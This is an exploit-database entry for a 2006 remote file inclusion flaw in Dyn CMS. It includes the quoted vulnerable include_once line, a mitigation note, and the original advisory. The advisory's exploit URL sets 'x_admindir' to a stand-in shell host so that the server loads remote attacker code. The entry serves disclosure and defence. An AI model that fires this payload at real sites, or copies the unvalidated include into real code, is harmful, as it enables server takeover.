header-logo
Suggest Exploit
vendor:
Dyn CMS
by:
SHiKaA
N/A
CVSS
N/A
Remote File Inclusion
98
CWE
Product Name: Dyn CMS
Affected Version From: REleased
Affected Version To: REleased
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Dyn CMS <= REleased (x_admindir) Remote File Inclusion Exploit

A vulnerability exists in Dyn CMS <= REleased, due to the improper validation of user-supplied input in the 'x_admindir' parameter of the '0_admin/modules/Wochenkarte/frontend/index.php' script. This can be exploited to include arbitrary remote files by passing a URL in the 'x_admindir' parameter. Successful exploitation requires that 'allow_url_include' is set to 'On' in the 'php.ini' file.

Mitigation:

Ensure that user-supplied input is properly validated and that 'allow_url_include' is set to 'Off' in the 'php.ini' file.
Source

Exploit-DB raw data:

#==============================================================================================
#Dyn CMS <= REleased (x_admindir) Remote File Inclusion Exploit
#===============================================================================================
#                                                                          
#Critical Level : Dangerous                                                
#                                                                          
#Venedor site : http://www.dyncms.com/          
#                                                                          
#Version : REleased                                                
#                                                            
#================================================================================================
#Bug in : 0_admin/modules/Wochenkarte/frontend/index.php
#
#Vlu Code :
#--------------------------------
#     include_once($x_admindir."/modules/".$xmodulname."/frontend/tools.inc.php");
#    
#
#================================================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/0_admin/modules/Wochenkarte/frontend/index.php?x_admindir=http://SHELLURL.COM?
#
#================================================================================================
#Discoverd By : SHiKaA
#
#Conatact : SHiKaA-[at]hotmail.com
#
#GreetZ : Str0ke KACPER Rgod Timq XoRon MDX Bl@Ck^B1rd AND ALL ccteam (coder-cruze-wolf) | cyper-worrior
==================================================================================================

# milw0rm.com [2006-09-02]